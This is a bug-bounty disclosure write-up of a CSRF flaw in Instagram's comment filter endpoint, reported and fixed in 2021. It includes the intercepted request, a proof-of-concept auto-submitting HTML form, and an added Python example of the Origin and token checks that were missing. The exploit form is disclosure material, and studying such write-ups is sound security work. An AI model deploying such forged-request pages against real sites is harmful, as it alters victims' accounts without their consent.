CSRF in Instagram

Mohamed Laajimi
2 min read, Nov 23, 2021

Description/Impact:

An attacker could change the comment keyword filter on behalf of other users on Instagram.com by exploiting a CSRF vulnerability. After this vulnerability was reported, Facebook's internal research found other vulnerable endpoints that might lead to account takeover.

Reproduction steps:

Step 1: open https://www.instagram.com/accounts/comment_filter/

Step 2: add any keyword and intercept the request

POST /accounts/set_comment_filter_keywords_web/ HTTP/1.1
Host: www.instagram.com

In the request there is an interesting header, X-CSRFTOKEN. This header is supposed to verify that the request is coming from the owner of the account.

When this header is deleted, the request is still sent successfully and gets the response

HTTP 200 OK
status { ok}

Here we can see that there is no check of the CSRF token.

Step 3: write the exploit for this vulnerability

<html>
  <head>
    <title>exploit csrf</title>
  </head>
  <body>
    <form action="https://www.instagram.com/accounts/set_comment_filter_keywords_web/" method="POST">
      <input type="hidden" name="keywords" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

You can also include an auto-submit script (placed after the form so that forms[0] exists when it runs):

<script>
  document.forms[0].submit();
</script>

Here we can see that there is no check of either X-CSRFTOKEN or Origin.
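As an added example (not code from the original post or from Instagram), this is the server-side check whose absence the write-up demonstrates: a state-changing request is refused unless its Origin (or Referer) is the site's own and the X-CSRFTOKEN header matches the csrftoken cookie. The origin allowlist, cookie name and the sample requests are assumptions constructed for the example.

```python
import hmac
from urllib.parse import urlsplit

# Assumed site origin allowlist and cookie/header names (constructed for this example).
ALLOWED_ORIGINS = {"https://www.instagram.com"}
CSRF_COOKIE = "csrftoken"
CSRF_HEADER = "x-csrftoken"
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def csrf_check(method, headers, cookies, allowed_origins=ALLOWED_ORIGINS):
    """Return (allowed, reason) for a request. Both checks must pass:
    1. Origin (or Referer as fallback) is one of our own origins.
    2. X-CSRFTOKEN header equals the csrftoken cookie (double-submit pattern).
       A third-party page can make the browser attach the cookie but cannot
       read it, so it cannot produce a matching header.
    """
    if method.upper() in SAFE_METHODS:
        return True, "safe method"
    h = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive

    origin = h.get("origin")
    if origin is None and h.get("referer"):
        parts = urlsplit(h["referer"])
        origin = f"{parts.scheme}://{parts.netloc}"
    if origin is None or origin not in allowed_origins:
        return False, "origin not allowed"

    header_token = h.get(CSRF_HEADER)
    cookie_token = cookies.get(CSRF_COOKIE)
    if not header_token or not cookie_token:
        return False, "missing csrf token"
    if not hmac.compare_digest(header_token, cookie_token):  # constant-time compare
        return False, "csrf token mismatch"
    return True, "ok"


# Constructed sample requests. The browser attaches the cookies in every case;
# only the headers differ.
COOKIES = {CSRF_COOKIE: "tok-1234", "sessionid": "sess-abcd"}
LEGIT = {"Origin": "https://www.instagram.com", "X-CSRFTOKEN": "tok-1234"}
# Step 2 of the write-up: same origin, X-CSRFTOKEN header deleted.
HEADER_DELETED = {"Origin": "https://www.instagram.com"}
# Step 3 of the write-up: a form auto-submitted from a third-party page.
CROSS_SITE = {"Origin": "https://third-party.example", "Referer": "https://third-party.example/"}

if __name__ == "__main__":
    for name, hdrs in [("legit", LEGIT), ("header deleted", HEADER_DELETED), ("cross-site", CROSS_SITE)]:
        print(name, csrf_check("POST", hdrs, COOKIES))
```

With both checks in place the Step 2 request fails on the missing token and the Step 3 form fails on its Origin, which is what the vulnerable endpoint did not do.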

After the initially reported bug was fixed, further internal research identified other vulnerable endpoints.

Timeline:

16/01/2021: I sent the report

19/01/2021: Acknowledged by Facebook

22/02/2021: Fixed & bounty awarded
